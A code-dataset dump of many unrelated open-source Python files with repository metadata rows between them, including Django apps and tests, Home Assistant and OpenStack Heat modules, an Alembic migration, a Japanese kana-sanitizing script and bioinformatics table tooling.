cmd_pub.publish(cmd_msg)
depth_sub = rospy.Subscriber('object_detection/depth_GG', Image, depth_callback, queue_size=1)
#robot_pos_sub = rospy.Subscriber('/UR5_pose', PoseStamped, robot_pos_callback, queue_size=1)
rospy.spin()
| 35.287611
| 148
| 0.66721
|
794d901cce31a0a30bd38682d72b9a79afb6fefd
| 722
|
py
|
Python
|
homeassistant/components/zwave/websocket_api.py
|
bigiot/home-assistant
|
2e6038b6405885deafa64f4e710e2207ce0ee582
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/zwave/websocket_api.py
|
bigiot/home-assistant
|
2e6038b6405885deafa64f4e710e2207ce0ee582
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/zwave/websocket_api.py
|
bigiot/home-assistant
|
2e6038b6405885deafa64f4e710e2207ce0ee582
|
[
"Apache-2.0"
] | 2
|
2019-01-21T05:49:23.000Z
|
2019-02-19T16:30:48.000Z
|
"""Web socket API for Z-Wave."""
import logging
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.core import callback
from .const import DATA_NETWORK
_LOGGER = logging.getLogger(__name__)
TYPE = "type"
ID = "id"
@websocket_api.require_admin
@websocket_api.websocket_command({vol.Required(TYPE): "zwave/network_status"})
def websocket_network_status(hass, connection, msg):
"""Get Z-Wave network status."""
network = hass.data[DATA_NETWORK]
connection.send_result(msg[ID], {"state": network.state})
@callback
def async_load_websocket_api(hass):
"""Set up the web socket API."""
websocket_api.async_register_command(hass, websocket_network_status)
| 24.066667
| 78
| 0.764543
|
794d917af94edfbc51cfb12c2810fc8c40a42f7e
| 2,554
|
py
|
Python
|
ditto/dittoforms/utils.py
|
Kvoti/ditto
|
eb4efb241e54bf679222d14afeb71d9d5441c122
|
[
"BSD-3-Clause"
] | null | null | null |
ditto/dittoforms/utils.py
|
Kvoti/ditto
|
eb4efb241e54bf679222d14afeb71d9d5441c122
|
[
"BSD-3-Clause"
] | 9
|
2015-11-10T15:17:22.000Z
|
2015-11-12T11:07:02.000Z
|
ditto/dittoforms/utils.py
|
Kvoti/ditto
|
eb4efb241e54bf679222d14afeb71d9d5441c122
|
[
"BSD-3-Clause"
] | null | null | null |
import json
from django import forms
from .models import FormSubmission
class FormFromSpecMixin(object):
def add_fields_from_spec(self, spec):
for item in spec:
if 'on' in item and not item['on']:
continue
if 'fields' in item:
# group of fields
# TODO form config should probably separate out UI stuff like field grouping
# from field definitions
for field_spec in item['fields']:
self.add_field(field_spec)
else:
self.add_field(item)
def add_field(self, spec):
if 'on' in spec and not spec['on']:
return
if 'required' not in spec:
spec['required'] = False
if 'options' in spec: # TODO better to have explicit types for fields
if spec.get('multiple', False):
self.add_multi_choice_field(spec)
else:
self.add_choice_field(spec)
else:
self.add_text_field(spec)
def add_text_field(self, spec):
self.fields[spec['name']] = forms.CharField(
max_length=100, required=spec['required']
)
def add_choice_field(self, spec):
choices = zip(spec['options'], spec['options'])
self.fields[spec['name']] = forms.ChoiceField(
choices=choices,
required=spec['required']
)
def add_multi_choice_field(self, spec):
choices = zip(spec['options'], spec['options'])
self.fields[spec['name']] = forms.MultipleChoiceField(
choices=choices,
required=spec['required']
)
def save_submission(self, spec, user):
FormSubmission.objects.create(
form=spec,
user=user,
# TODO just extract relevant fields from self.data (
# form might have extra fields or other metadata in self.data)
data=json.dumps(self.data)
)
class Form(FormFromSpecMixin, forms.Form):
"""
Create a form from config.
Only used for serve-side valiation of POSTed data, not for form display.
"""
def __init__(self, user, spec, *args, **kwargs):
super(Form, self).__init__(*args, **kwargs)
self.user = user
self.spec = spec
self.add_fields_from_spec(json.loads(spec.spec))
def save(self):
FormSubmission.objects.create(
user=self.user,
form=self.spec,
data=json.dumps(self.data)
)
| 30.404762
| 92
| 0.568912
|
794d9286b786da4b4a6a8c9a1266f29a7750d86b
| 2,529
|
py
|
Python
|
app/recipe/tests/test_tags_api.py
|
emeraldev/recipe-app-api
|
9483c71c85e55b4ba3de9af7e30aecb7b39fe194
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_tags_api.py
|
emeraldev/recipe-app-api
|
9483c71c85e55b4ba3de9af7e30aecb7b39fe194
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_tags_api.py
|
emeraldev/recipe-app-api
|
9483c71c85e55b4ba3de9af7e30aecb7b39fe194
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""Test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login required for retrieving tags"""
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the private tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'test@spielage.com',
'password'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags_list(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name='Vegan')
Tag.objects.create(user=self.user, name='Dessert')
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_tags_limited_to_user(self):
"""Test that tags returned are for authenticated user"""
user2 = get_user_model().objects.create_user(
'other@spielage.com',
'testpass'
)
Tag.objects.create(user=user2, name='Fruity')
tag = Tag.objects.create(user=self.user, name='Comfort Food')
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], tag.name)
def test_create_tag_successful(self):
"""Test creating a new tag"""
payload = {'name': 'Test Tag'}
self.client.post(TAGS_URL, payload)
exists = Tag.objects.filter(
user=self.user,
name=payload['name']
).exists()
self.assertTrue(exists)
def test_create_tag_invalid(self):
"""Test creating a new tag with invalid payload"""
payload = {'name': ''}
res = self.client.post(TAGS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
| 30.107143
| 71
| 0.654013
|
794d9297da5d65c5f2b6ad7582e2d89e85450ce3
| 608
|
py
|
Python
|
api/util/stub.py
|
aleibovici/datrium_natural_hazard_protection
|
7ae593050765d8d30bbc08b436bbe334e59d985a
|
[
"Apache-2.0"
] | null | null | null |
api/util/stub.py
|
aleibovici/datrium_natural_hazard_protection
|
7ae593050765d8d30bbc08b436bbe334e59d985a
|
[
"Apache-2.0"
] | null | null | null |
api/util/stub.py
|
aleibovici/datrium_natural_hazard_protection
|
7ae593050765d8d30bbc08b436bbe334e59d985a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#**************************************************************
#* Copyright (c) 2017 Datrium, Inc. All rights reserved. *
#* -- Datrium Confidential -- *
#**************************************************************
from datrium.rpc.client.stub_factory import StubFactory
from .api_invoker import ApiInvoker
def get_stub(dvx, iface):
"""
Get stub to invoke APIs
"""
api = ApiInvoker(user_name=dvx.user_name, password=dvx.password)
stub_factory = StubFactory(api)
return stub_factory.create_stub(iface, endpoint=dvx.ip)
| 33.777778
| 68
| 0.524671
|
794d92a0431f481e02accf68302593fe5736e4fc
| 168
|
py
|
Python
|
data/kernel_binaries/assemble.py
|
harskish/Fluctus
|
861cf7a88c3b6ac2c051c67b6216e36653eb64f7
|
[
"MIT"
] | 52
|
2017-06-26T13:23:41.000Z
|
2022-01-12T07:09:28.000Z
|
data/kernel_binaries/assemble.py
|
harskish/Fluctus
|
861cf7a88c3b6ac2c051c67b6216e36653eb64f7
|
[
"MIT"
] | null | null | null |
data/kernel_binaries/assemble.py
|
harskish/Fluctus
|
861cf7a88c3b6ac2c051c67b6216e36653eb64f7
|
[
"MIT"
] | 14
|
2018-11-07T05:52:24.000Z
|
2021-12-25T02:24:33.000Z
|
import glob
import os
files = glob.glob("*.cl.ptx")
for ptx in files:
inst = "ptxas {} -o {}.elf --gpu-name sm_61".format(ptx, ptx[:-4])
print(inst)
os.system(inst)
| 21
| 67
| 0.642857
|
794d933e7f84d7c02670ce9deaad985a3fb08578
| 325
|
py
|
Python
|
pollme/urls.py
|
satya1145/Django-Poll-App-master
|
aa1649cb11ff34e3c1ae6bf3364c53eb1939db51
|
[
"MIT"
] | 20
|
2021-05-02T19:32:24.000Z
|
2021-07-09T19:16:34.000Z
|
pollme/urls.py
|
satya1145/Django-Poll-App-master
|
aa1649cb11ff34e3c1ae6bf3364c53eb1939db51
|
[
"MIT"
] | 3
|
2021-06-01T14:29:21.000Z
|
2021-06-08T06:42:20.000Z
|
pollme/urls.py
|
satya1145/Django-Poll-App-master
|
aa1649cb11ff34e3c1ae6bf3364c53eb1939db51
|
[
"MIT"
] | 1
|
2021-09-12T19:22:16.000Z
|
2021-09-12T19:22:16.000Z
|
from django.contrib import admin
from django.urls import path, include
from . import views
urlpatterns = [
path('admin/', admin.site.urls),
path('home/', views.home, name='home'),
path('polls/', include('polls.urls', namespace="polls")),
path('accounts/', include('accounts.urls', namespace="accounts")),
]
| 27.083333
| 70
| 0.673846
|
794d9382fa884a04bda75abf14f7cbf6b8aa925c
| 1,754
|
py
|
Python
|
tensorflow_probability/python/internal/backend/numpy/deprecation.py
|
brianwa84/probability
|
6f8e78d859ac41170be5147c8c7bde54cc5aa83e
|
[
"Apache-2.0"
] | 2
|
2020-12-17T20:43:24.000Z
|
2021-06-11T22:09:16.000Z
|
tensorflow_probability/python/internal/backend/numpy/deprecation.py
|
brianwa84/probability
|
6f8e78d859ac41170be5147c8c7bde54cc5aa83e
|
[
"Apache-2.0"
] | 2
|
2021-08-25T16:14:51.000Z
|
2022-02-10T04:47:11.000Z
|
tensorflow_probability/python/internal/backend/numpy/deprecation.py
|
brianwa84/probability
|
6f8e78d859ac41170be5147c8c7bde54cc5aa83e
|
[
"Apache-2.0"
] | 1
|
2020-05-31T13:08:33.000Z
|
2020-05-31T13:08:33.000Z
|
# Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Stub implementation of tensorflow.python.util.deprecation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
# pylint: disable=unused-argument
def deprecated_alias(deprecated_name, name, func_or_class, warn_once=True):
return func_or_class
def deprecated_endpoints(*args):
return lambda func: func
def deprecated(date, instructions, warn_once=True):
return lambda func: func
def deprecated_args(date, instrutions, *deprecated_arg_names_or_tuples,
**kwargs):
return lambda func: func
def deprecated_arg_values(date, instructions, warn_once=True,
**deprecated_kwargs):
return lambda func: func
def deprecated_argument_lookup(new_name, new_value, old_name, old_value):
if old_value is not None:
if new_value is not None:
raise ValueError("Cannot specify both '%s' and '%s'" %
(old_name, new_name))
return old_value
return new_value
@contextlib.contextmanager
def silence():
yield
| 29.233333
| 78
| 0.710946
|
794d940441c6265f656c5126900f6634e58621c0
| 1,491
|
py
|
Python
|
app/forms.py
|
lambrosopos/bible-school-web-app
|
7206026d0cb014c518314b76bd6fd7a223582044
|
[
"MIT"
] | null | null | null |
app/forms.py
|
lambrosopos/bible-school-web-app
|
7206026d0cb014c518314b76bd6fd7a223582044
|
[
"MIT"
] | null | null | null |
app/forms.py
|
lambrosopos/bible-school-web-app
|
7206026d0cb014c518314b76bd6fd7a223582044
|
[
"MIT"
] | null | null | null |
from django import forms
from django.utils.translation import gettext_lazy as _
from .models import Student
class StudentForm(forms.ModelForm):
class Meta:
model = Student
fields = [ 'name', 'title', 'contact', 'memo', 'church', 'cohort']
widgets = {
"name": forms.TextInput(
attrs={
"placeholder":"이름을 입력해주세요 (예: 홍길동)"
}
),
"title": forms.Select(
attrs={
"placeholder":"현재 담당하고 있는 직책을 선택해주세요"
"(없는 경우에는 관리자에게 문의해주세요)"
}
),
"contact": forms.TextInput(
attrs={
"placeholder":"(예시: 010-1234-4321)"
}
),
"church": forms.Select(
attrs={
"placeholder":"현재 출석중인 계시는 교회를 선택해주세요"
"(없는 경우 관리자에게 문의해주세요)"
}
),
"cohort": forms.Select(
attrs={
"placeholder":"등록할 기수를 선택해주세요"
}
),
"memo": forms.Textarea(
attrs={
"placeholder":"추가로 필요한 메모가 있다면 적어주세요"
}
),
}
labels = {
"name": _("이름"),
"title": _("직책"),
"contact": _("연락처"),
"church": _("교회"),
"cohort": _("기수"),
"memo": _("메모")
}
| 28.132075
| 74
| 0.380952
|
794d94442dfccd9fb0860ed1722ed3107bbed462
| 1,244
|
py
|
Python
|
qiime_16s/combine_collapsed_otu_tables.py
|
lotrus28/TaboCom
|
b67d66e4c410375a9efa08c5e637301e78e9204b
|
[
"Apache-2.0"
] | null | null | null |
qiime_16s/combine_collapsed_otu_tables.py
|
lotrus28/TaboCom
|
b67d66e4c410375a9efa08c5e637301e78e9204b
|
[
"Apache-2.0"
] | null | null | null |
qiime_16s/combine_collapsed_otu_tables.py
|
lotrus28/TaboCom
|
b67d66e4c410375a9efa08c5e637301e78e9204b
|
[
"Apache-2.0"
] | null | null | null |
import sys
import re
import pandas as pd
def combine_otu_tables(path_to_files):
with open(path_to_files) as a:
filenames = a.read().splitlines()
separated = {re.search(r'ERR\d+?(?=_)',x).group(0):pd.read_table(x, sep = '\t', index_col = 1, header = None,engine='python')
for x in filenames}
indices = [list(x.index) for x in list(separated.values())]
all_taxa = sum(indices,[])
all_taxa = list(set(all_taxa))
altogether = pd.DataFrame(None, columns = list(separated.keys()), index = all_taxa)
for pat in separated:
altogether[pat] = separated[pat][0]
altogether = altogether.fillna(0)
altogether['Mean'] = altogether.mean(axis = 1)
if float(pd.__version__[:4]) >= 0.17:
altogether = altogether.sort_values('Mean', axis = 0, ascending=False)
else:
altogether = altogether.sort('Mean', axis = 0, ascending=False)
return(altogether.ix[:,:-1])
def main():
# list_of_files = 'temp2.txt'
# output = 'combined.txt'
list_of_files = sys.argv[1]
output = sys.argv[2]
combined = combine_otu_tables(list_of_files)
print('Combining all OTU-tables')
combined.to_csv(output, sep = '\t')
if __name__ == "__main__":
main()
| 30.341463
| 129
| 0.639871
|
794d94b3b6202103969dece6193fe5cd4f56b8d5
| 8,914
|
py
|
Python
|
adminsortable/admin.py
|
dokterbob/django-admin-sortable
|
4e5e4af8b157cc323acbb69491f1b08b9f3e62bf
|
[
"MS-PL",
"Naumen",
"Condor-1.1",
"Apache-1.1"
] | null | null | null |
adminsortable/admin.py
|
dokterbob/django-admin-sortable
|
4e5e4af8b157cc323acbb69491f1b08b9f3e62bf
|
[
"MS-PL",
"Naumen",
"Condor-1.1",
"Apache-1.1"
] | null | null | null |
adminsortable/admin.py
|
dokterbob/django-admin-sortable
|
4e5e4af8b157cc323acbb69491f1b08b9f3e62bf
|
[
"MS-PL",
"Naumen",
"Condor-1.1",
"Apache-1.1"
] | null | null | null |
import json
from django.conf import settings
from django.conf.urls.defaults import patterns, url
from django.contrib.admin import ModelAdmin, TabularInline, StackedInline
from django.contrib.admin.options import InlineModelAdmin
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponse
from django.shortcuts import render
from django.template.defaultfilters import capfirst
from django.views.decorators.csrf import csrf_exempt
from adminsortable.fields import SortableForeignKey
from adminsortable.models import Sortable
STATIC_URL = settings.STATIC_URL
class SortableAdmin(ModelAdmin):
ordering = ('order', 'id')
class Meta:
abstract = True
def _get_sortable_foreign_key(self):
sortable_foreign_key = None
for field in self.model._meta.fields:
if isinstance(field, SortableForeignKey):
sortable_foreign_key = field
break
return sortable_foreign_key
def __init__(self, *args, **kwargs):
super(SortableAdmin, self).__init__(*args, **kwargs)
self.has_sortable_tabular_inlines = False
self.has_sortable_stacked_inlines = False
for klass in self.inlines:
if issubclass(klass, SortableTabularInline):
if klass.model.is_sortable():
self.has_sortable_tabular_inlines = True
if issubclass(klass, SortableStackedInline):
if klass.model.is_sortable():
self.has_sortable_stacked_inlines = True
def get_urls(self):
urls = super(SortableAdmin, self).get_urls()
admin_urls = patterns('',
url(r'^sorting/do-sorting/(?P<model_type_id>\d+)/$',
self.admin_site.admin_view(self.do_sorting_view),
name='admin_do_sorting'), #this view changes the order
url(r'^sort/$', self.admin_site.admin_view(self.sort_view),
name='admin_sort'), #this view shows a link to the drag-and-drop view
)
return admin_urls + urls
def sort_view(self, request):
"""
Custom admin view that displays the objects as a list whose sort order can be
changed via drag-and-drop.
"""
opts = self.model._meta
admin_site = self.admin_site
has_perm = request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
objects = self.model.objects.all()
#Determine if we need to regroup objects relative to a foreign key specified on the
# model class that is extending Sortable.
#Legacy support for 'sortable_by' defined as a model property
sortable_by_property = getattr(self.model, 'sortable_by', None)
#`sortable_by` defined as a SortableForeignKey
sortable_by_fk = self._get_sortable_foreign_key()
if sortable_by_property:
#backwards compatibility for < 1.1.1, where sortable_by was a classmethod instead of a property
try:
sortable_by_class, sortable_by_expression = sortable_by_property()
except TypeError, ValueError:
sortable_by_class = self.model.sortable_by
sortable_by_expression = sortable_by_class.__name__.lower()
sortable_by_class_display_name = sortable_by_class._meta.verbose_name_plural
sortable_by_class_is_sortable = sortable_by_class.is_sortable()
elif sortable_by_fk:
#get sortable by properties from the SortableForeignKey field - supported in 1.3+
sortable_by_class_display_name = sortable_by_fk.rel.to._meta.verbose_name_plural
sortable_by_class = sortable_by_fk.rel.to
sortable_by_expression = sortable_by_fk.name.lower()
sortable_by_class_is_sortable = sortable_by_class.is_sortable()
else:
#model is not sortable by another model
sortable_by_class = sortable_by_expression = sortable_by_class_display_name =\
sortable_by_class_is_sortable = None
if sortable_by_property or sortable_by_fk:
# Order the objects by the property they are sortable by, then by the order, otherwise the regroup
# template tag will not show the objects correctly as
# shown in https://docs.djangoproject.com/en/1.3/ref/templates/builtins/#regroup
objects = objects.order_by(sortable_by_expression, 'order')
try:
verbose_name_plural = opts.verbose_name_plural.__unicode__()
except AttributeError:
verbose_name_plural = opts.verbose_name_plural
context = {
'title' : 'Drag and drop %s to change display order' % capfirst(verbose_name_plural),
'opts' : opts,
'app_label' : opts.app_label,
'has_perm' : has_perm,
'objects' : objects,
'group_expression' : sortable_by_expression,
'sortable_by_class' : sortable_by_class,
'sortable_by_class_is_sortable' : sortable_by_class_is_sortable,
'sortable_by_class_display_name' : sortable_by_class_display_name
}
return render(request, 'adminsortable/change_list.html', context)
def changelist_view(self, request, extra_context=None):
"""
If the model that inherits Sortable has more than one object,
its sort order can be changed. This view adds a link to the object_tools
block to take people to the view to change the sorting.
"""
if self.model.is_sortable():
self.change_list_template = 'adminsortable/change_list_with_sort_link.html'
return super(SortableAdmin, self).changelist_view(request, extra_context=extra_context)
def change_view(self, request, object_id, extra_context=None):
if self.has_sortable_tabular_inlines or self.has_sortable_stacked_inlines:
self.change_form_template = 'adminsortable/change_form.html'
extra_context = {
'has_sortable_tabular_inlines' : self.has_sortable_tabular_inlines,
'has_sortable_stacked_inlines' : self.has_sortable_stacked_inlines
}
return super(SortableAdmin, self).change_view(request, object_id, extra_context=extra_context)
@csrf_exempt
def do_sorting_view(self, request, model_type_id=None):
"""
This view sets the ordering of the objects for the model type and primary keys
passed in. It must be an Ajax POST.
"""
if request.is_ajax() and request.method == 'POST':
try:
indexes = map(str, request.POST.get('indexes', []).split(','))
klass = ContentType.objects.get(id=model_type_id).model_class()
objects_dict = dict([(str(obj.pk), obj) for obj in klass.objects.filter(pk__in=indexes)])
if '-order' in klass._meta.ordering: #desc order
start_object = max(objects_dict.values(), key=lambda x: getattr(x, 'order'))
start_index = getattr(start_object, 'order') or len(indexes)
step = -1
else: #'order' is default, asc order
start_object = min(objects_dict.values(), key=lambda x: getattr(x, 'order'))
start_index = getattr(start_object, 'order') or 0
step = 1
for index in indexes:
obj = objects_dict.get(index)
setattr(obj, 'order', start_index)
obj.save()
start_index += step
response = {'objects_sorted' : True}
except (Key, IndexError, klass.DoesNotExist, AttributeError):
pass
else:
response = {'objects_sorted' : False}
return HttpResponse(json.dumps(response, ensure_ascii=False),
mimetype='application/json')
class SortableInlineBase(InlineModelAdmin):
def __init__(self, *args, **kwargs):
super(SortableInlineBase, self).__init__(*args, **kwargs)
if not issubclass(self.model, Sortable):
raise Warning(u'Models that are specified in SortableTabluarInline and SortableStackedInline '
'must inherit from Sortable')
self.is_sortable = self.model.is_sortable()
class SortableTabularInline(SortableInlineBase, TabularInline):
"""Custom template that enables sorting for tabular inlines"""
template = 'adminsortable/edit_inline/tabular.html'
class SortableStackedInline(SortableInlineBase, StackedInline):
"""Custom template that enables sorting for stacked inlines"""
template = 'adminsortable/edit_inline/stacked.html'
| 45.948454
| 111
| 0.645277
|
794d955abe7c2e57c598ccba89b526dccd45098e
| 766
|
py
|
Python
|
migrations/versions/2ea41f4610fd_.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 4,258
|
2015-01-04T22:06:10.000Z
|
2022-03-31T23:40:27.000Z
|
migrations/versions/2ea41f4610fd_.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 1,013
|
2015-01-12T02:31:03.000Z
|
2021-09-16T19:09:03.000Z
|
migrations/versions/2ea41f4610fd_.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 965
|
2015-01-11T21:06:07.000Z
|
2022-03-17T16:53:57.000Z
|
"""Increasing size of name field to accomodate longer AWS Resource IDs
Revision ID: 2ea41f4610fd
Revises: 1727fb4309d8
Create Date: 2016-04-18 17:59:04.622111
"""
# revision identifiers, used by Alembic.
revision = '2ea41f4610fd'
down_revision = '1727fb4309d8'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('item', 'name', type_=sa.VARCHAR(303), existing_type=sa.VARCHAR(length=285), nullable=True)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('item', 'name', type_=sa.VARCHAR(285), existing_type=sa.VARCHAR(length=303), nullable=True)
### end Alembic commands ###
| 28.37037
| 111
| 0.718016
|
794d967a74c5e27749cd76fcccbe8f03d16ae821
| 3,234
|
py
|
Python
|
sanitize_kana.py
|
blueset/vocaloid-yomigana
|
240549955342bb4b02d0abcf21753809f8b9278c
|
[
"MIT"
] | 1
|
2021-09-06T22:44:10.000Z
|
2021-09-06T22:44:10.000Z
|
sanitize_kana.py
|
blueset/vocaloid-yomigana
|
240549955342bb4b02d0abcf21753809f8b9278c
|
[
"MIT"
] | null | null | null |
sanitize_kana.py
|
blueset/vocaloid-yomigana
|
240549955342bb4b02d0abcf21753809f8b9278c
|
[
"MIT"
] | null | null | null |
#%%
import MeCab
from pyokaka import okaka
import csv
import jaconv
import unicodedata
import re
tagger = MeCab.Tagger('-d /usr/local/lib/mecab/dic/mecab-ipadic-neologd --node-format="%M\t%f[7]\n" --unk-format="%M\t%M\n"')
prefix = "outcomes/fandom/fandom"
# %%
def romaji_to_hiragana(romaji):
return strip_punct(okaka.convert(romaji))
# %%
rows = []
with open(prefix + '.csv', newline='') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for row in spamreader:
rows.append(list(map(jaconv.normalize, row)))
# %%
def strip_punct(s):
return ''.join(c for c in jaconv.normalize(s) if unicodedata.category(c)[0] == 'L')
# %%
def kata_to_hira(s):
return ''.join(map(jaconv.kata2hira, s))
# %%
kana_pattern = re.compile(r'^[\u3041-\u3096\u30A1-\u30FAー]*$')
def all_kana(s):
return kana_pattern.match(strip_punct(s)) is not None
# %%
hira_pattern = re.compile(r'[\u3041-\u3096]+')
def find_all_hiragana(s):
return hira_pattern.findall(strip_punct(s))
# %%
hira_kan_pattern = re.compile(r'^[\u3041-\u3096々〇〻\u3400-\u9FFF\uF900-\uFAFF]+$')
def all_hira_kan(s):
return hira_kan_pattern.match(strip_punct(s)) is not None
# %%
def construct_kana(orig):
r = list(map(lambda a: a.split("\t"), tagger.parse(orig).split('\n')))[:-2]
return r, "".join(map(lambda a: a[1], r))
#%%
def sort_name(romaji, orig):
if all_kana(strip_punct(orig)):
return strip_punct(kata_to_hira(orig)), "safe"
recovered = romaji_to_hiragana(romaji)
if not recovered or not all_kana(recovered):
recovered = None
matching = recovered is not None
constructed_pairs, constructed = construct_kana(orig)
constructed = strip_punct(kata_to_hira(constructed))
if not all_hira_kan(kata_to_hira(strip_punct(orig))):
return constructed, "review"
if recovered is not None:
for kan, kata in constructed_pairs:
hira = kata_to_hira(kata)
if all_hira_kan(kan):
print("matching", hira, "in", recovered)
matching = matching and hira in recovered
return constructed, "safe" if matching else "review"
else:
return constructed, "review"
# %%
with_romaji = [i for i in rows if i[0]]
without_romaji = [i for i in rows if not i[0]]
# %%
to_review = []
no_romaji_to_review = []
safe = []
for romaji, orig in with_romaji:
kana, status = sort_name(romaji, orig)
if status == "safe":
safe.append((romaji, orig, kana))
elif status == "review":
to_review.append((romaji, orig, kana))
for romaji, orig in without_romaji:
kana, status = sort_name(romaji, orig)
if status == "safe":
safe.append((romaji, orig, kana))
elif status == "review":
no_romaji_to_review.append((romaji, orig, kana))
# %%
def write_csv(data, fn):
with open(fn, 'w', newline='') as csvfile:
writter = csv.writer(csvfile, delimiter=',',
quotechar='"', quoting=csv.QUOTE_MINIMAL)
for i in data:
writter.writerow(i)
# %%
write_csv(safe, prefix + "_safe.csv")
write_csv(to_review, prefix + "_to_review.csv")
write_csv(no_romaji_to_review, prefix + "_no_romaji_to_review.csv")
# %%
| 29.944444
| 125
| 0.649041
|
794d96a7082cb3e1850d0f14a5256cc0780a81e6
| 1,993
|
py
|
Python
|
heat/tests/clients/test_zaqar_client.py
|
jasondunsmore/heat
|
6bd7352dc4838b8ef782f2345a4dfdf57ba3e356
|
[
"Apache-2.0"
] | 1
|
2015-12-18T21:46:55.000Z
|
2015-12-18T21:46:55.000Z
|
heat/tests/clients/test_zaqar_client.py
|
jasondunsmore/heat
|
6bd7352dc4838b8ef782f2345a4dfdf57ba3e356
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/clients/test_zaqar_client.py
|
jasondunsmore/heat
|
6bd7352dc4838b8ef782f2345a4dfdf57ba3e356
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from heat.engine.clients.os import zaqar
from heat.tests import common
from heat.tests import utils
class ZaqarClientPluginTest(common.HeatTestCase):
def test_create(self):
context = utils.dummy_context()
plugin = context.clients.client_plugin('zaqar')
client = plugin.client()
self.assertEqual('http://server.test:5000/v3', client.api_url)
self.assertEqual(1.1, client.api_version)
self.assertEqual('test_tenant_id',
client.conf['auth_opts']['options']['os_project_id'])
def test_create_for_tenant(self):
context = utils.dummy_context()
plugin = context.clients.client_plugin('zaqar')
client = plugin.create_for_tenant('other_tenant', 'token')
self.assertEqual('other_tenant',
client.conf['auth_opts']['options']['os_project_id'])
self.assertEqual('token',
client.conf['auth_opts']['options']['os_auth_token'])
def test_event_sink(self):
context = utils.dummy_context()
client = context.clients.client('zaqar')
fake_queue = mock.MagicMock()
client.queue = lambda x, auto_create: fake_queue
sink = zaqar.ZaqarEventSink('myqueue')
sink.consume(context, {'hello': 'world'})
fake_queue.post.assert_called_once_with(
{'body': {'hello': 'world'}, 'ttl': 3600})
| 39.078431
| 78
| 0.66282
|
794d96d1424fb66ddc58b8247d8dfd491f4b9b3f
| 6,890
|
py
|
Python
|
watertap/examples/flowsheets/full_treatment_train/model_components/eNRTL/test_enrtl.py
|
avdudchenko/watertap
|
ac8d59e015688ff175a8087d2d52272e4f1fe84f
|
[
"BSD-3-Clause-LBNL"
] | 4
|
2021-11-06T01:13:22.000Z
|
2022-02-08T21:16:38.000Z
|
watertap/examples/flowsheets/full_treatment_train/model_components/eNRTL/test_enrtl.py
|
avdudchenko/watertap
|
ac8d59e015688ff175a8087d2d52272e4f1fe84f
|
[
"BSD-3-Clause-LBNL"
] | 233
|
2021-10-13T12:53:44.000Z
|
2022-03-31T21:59:50.000Z
|
watertap/examples/flowsheets/full_treatment_train/model_components/eNRTL/test_enrtl.py
|
avdudchenko/watertap
|
ac8d59e015688ff175a8087d2d52272e4f1fe84f
|
[
"BSD-3-Clause-LBNL"
] | 12
|
2021-11-01T19:11:03.000Z
|
2022-03-08T22:20:58.000Z
|
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
import pytest
from pyomo.environ import ConcreteModel, value
from idaes.core import FlowsheetBlock
from idaes.generic_models.properties.core.generic.generic_property import (
GenericParameterBlock,
)
from idaes.core.util.scaling import (
calculate_scaling_factors,
get_scaling_factor,
constraint_scaling_transform,
)
